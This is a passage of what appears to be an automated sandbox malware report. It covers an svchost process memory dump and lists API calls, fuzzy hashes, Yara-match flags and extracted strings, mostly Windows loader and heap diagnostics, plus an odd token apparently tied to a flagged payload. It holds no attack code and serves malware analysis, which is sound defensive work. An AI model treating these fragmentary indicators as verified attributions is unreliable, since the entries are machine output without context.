                                                                                        • Instruction ID: 0c4895d414c41d1d18866422d722d3ae31371503f4fc5ca20503da01dc16948f
                                                                                        • Opcode Fuzzy Hash: de5b455dfe2440bb83c49f27617af67ad353f9e0ee9afe5f53598bf78526276a
                                                                                        • Instruction Fuzzy Hash: C890023160550806D100B2984554746100687D0301FB5C451A142856CD87958A5565A3
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 0-1716353560

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • PostThreadMessageW.USER32(3f75FH48,00000111,00000000,00000000), ref: 00413F0A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MessagePostThread
                                                                                        • String ID: 3f75FH48$3f75FH48
                                                                                        • API String ID: 1836367815-1716353560

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(?,0041E3D1,?,?,00000000,?,0041E3D1,?,?,?), ref: 0042C682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00416ECD,000000F4), ref: 0042C6D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,5AA3D9B6,?,?,5AA3D9B6), ref: 0042C717
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2160512332
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-3089669407
                                                                                        Strings
                                                                                        • Address of the debug info found in the active list., xrefs: 038A54AE, 038A54FA
                                                                                        • double initialized or corrupted critical section, xrefs: 038A5508
                                                                                        • Critical section debug info address, xrefs: 038A541F, 038A552E
                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 038A5543
                                                                                        • undeleted critical section in freed memory, xrefs: 038A542B
                                                                                        • ICwICw@4Cw@4Cw, xrefs: 038A5341, 038A534D
                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A540A, 038A5496, 038A5519
                                                                                        • corrupted critical section, xrefs: 038A54C2
                                                                                        • Critical section address., xrefs: 038A5502
                                                                                        • Invalid debug info address of this critical section, xrefs: 038A54B6
                                                                                        • Thread identifier, xrefs: 038A553A
                                                                                        • 8, xrefs: 038A52E3
                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A54E2
                                                                                        • Critical section address, xrefs: 038A5425, 038A54BC, 038A5534
                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038A54CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$ICwICw@4Cw@4Cw
                                                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                        • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                        Strings
                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0382D0CF
                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0382D146
                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 0382D196
                                                                                        • @, xrefs: 0382D313
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0382D2C3
                                                                                        • @, xrefs: 0382D2AF
                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0382D262
                                                                                        • @, xrefs: 0382D0FD
                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                        Strings
                                                                                        • minkernel\ntdll\sxsisol.cpp, xrefs: 03897713, 038978A4
                                                                                        • Internal error check failed, xrefs: 03897718, 038978A9
                                                                                        • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03897709
                                                                                        • @, xrefs: 03849EE7
                                                                                        • sxsisol_SearchActCtxForDllName, xrefs: 038976DD
                                                                                        • Status != STATUS_NOT_FOUND, xrefs: 0389789A
                                                                                        • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 038976EE
                                                                                        • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 038A8181, 038A81F5
                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 038A8170
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0386C6C3
                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 038A81E5
                                                                                        • LdrpInitializeImportRedirection, xrefs: 038A8177, 038A81EB
                                                                                        • LdrpInitializeProcess, xrefs: 0386C6C4
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                        Strings
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 03855247
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 0385542B
                                                                                        • WindowsExcludedProcs, xrefs: 0385522A
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 03855352
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 0385527B
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                        Strings
                                                                                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03897D03
                                                                                        • SsHd, xrefs: 0384A885
                                                                                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03897D56
                                                                                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03897D39
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 038954D1, 03895592
                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 038955AE
                                                                                        • HEAP: , xrefs: 038954E0, 038955A1
                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 038954ED
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                        Strings
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 038A22B6
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 038A21DE
                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 038A21D9, 038A22B1
                                                                                        • .Local, xrefs: 038628D8
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                        • API String ID: 0-336120773
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                        • API String ID: 0-1391187441
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 03843255
                                                                                        • HEAP: , xrefs: 03843264
                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0384327D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                        • API String ID: 0-617086771
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-4253913091
                                                                                        Strings
                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03831728
                                                                                        • HEAP[%wZ]: , xrefs: 03831712
                                                                                        • HEAP: , xrefs: 03831596
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                        • API String ID: 0-1145731471
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                        • API String ID: 0-2391371766
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: VUUU$VUUU$gfff
                                                                                        • API String ID: 0-2314002932
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@
                                                                                        • API String ID: 0-1077428164
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                        • API String ID: 0-318774311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %$&$@
                                                                                        • API String ID: 0-1537733988
                                                                                        Strings
                                                                                        • GlobalizationUserSettings, xrefs: 0390B834
                                                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0390B82A
                                                                                        • TargetNtPath, xrefs: 0390B82F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                        • API String ID: 0-505981995
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 0388E6A6
                                                                                        • HEAP: , xrefs: 0388E6B3
                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0388E6C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                        • API String ID: 0-1340214556
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 038DDC12
                                                                                        • HEAP: , xrefs: 038DDC1F
                                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 038DDC32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                        • API String ID: 0-3815128232
                                                                                        Strings
                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 038A82DE
                                                                                        • Failed to reallocate the system dirs string !, xrefs: 038A82D7
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 038A82E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1783798831
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 038A1B4A
                                                                                        • LdrpAllocateTls, xrefs: 038A1B40
                                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 038A1B39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
